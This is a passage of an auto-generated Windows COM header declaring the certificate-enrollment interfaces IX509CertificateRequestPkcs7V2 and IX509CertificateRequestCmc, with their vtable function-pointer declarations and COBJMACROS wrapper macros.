            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequesterName )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_RequesterName )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *CheckCertificateSignature )( 
            __RPC__in IX509CertificateRequestPkcs7V2 * This,
            /* [in] */ VARIANT_BOOL ValidateCertificateChain);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs7V2Vtbl;

    interface IX509CertificateRequestPkcs7V2
    {
        CONST_VTBL struct IX509CertificateRequestPkcs7V2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs7V2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs7V2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs7V2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs7V2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs7V2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs7V2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs7V2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs7V2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs7V2_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs7V2_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs7V2_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs7V2_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs7V2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs7V2_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs7V2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs7V2_InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs7V2_InitializeFromInnerRequest(This,pInnerRequest)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequest(This,pInnerRequest) ) 

#define IX509CertificateRequestPkcs7V2_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs7V2_get_RequesterName(This,pValue)	\
    ( (This)->lpVtbl -> get_RequesterName(This,pValue) ) 

#define IX509CertificateRequestPkcs7V2_put_RequesterName(This,Value)	\
    ( (This)->lpVtbl -> put_RequesterName(This,Value) ) 

#define IX509CertificateRequestPkcs7V2_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestPkcs7V2_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 


#define IX509CertificateRequestPkcs7V2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs7V2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestPkcs7V2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#define IX509CertificateRequestPkcs7V2_CheckCertificateSignature(This,ValidateCertificateChain)	\
    ( (This)->lpVtbl -> CheckCertificateSignature(This,ValidateCertificateChain) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs7V2_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestCmc_INTERFACE_DEFINED__
#define __IX509CertificateRequestCmc_INTERFACE_DEFINED__

/* interface IX509CertificateRequestCmc */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestCmc;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab345-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestCmc : public IX509CertificateRequestPkcs7
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromInnerRequestTemplateName( 
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NullSigned( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CryptAttributes( 
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NameValuePairs( 
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509Extensions( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CriticalExtensions( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SuppressOids( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TransactionId( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_TransactionId( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SenderNonce( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SenderNonce( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignatureInformation( 
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ArchivePrivateKey( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ArchivePrivateKey( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeyArchivalCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_KeyArchivalCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_EncryptionAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptionStrength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_EncryptionStrength( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncryptedKeyHash( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_SignerCertificates( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificates **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestCmcVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestCmc * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestCmc * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestCmc * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestCmc * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestCmc * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequest )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequesterName )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_RequesterName )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequestTemplateName )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TransactionId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_TransactionId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SenderNonce )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SenderNonce )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ArchivePrivateKey )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ArchivePrivateKey )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ VARIANT_BOOL Value);
        
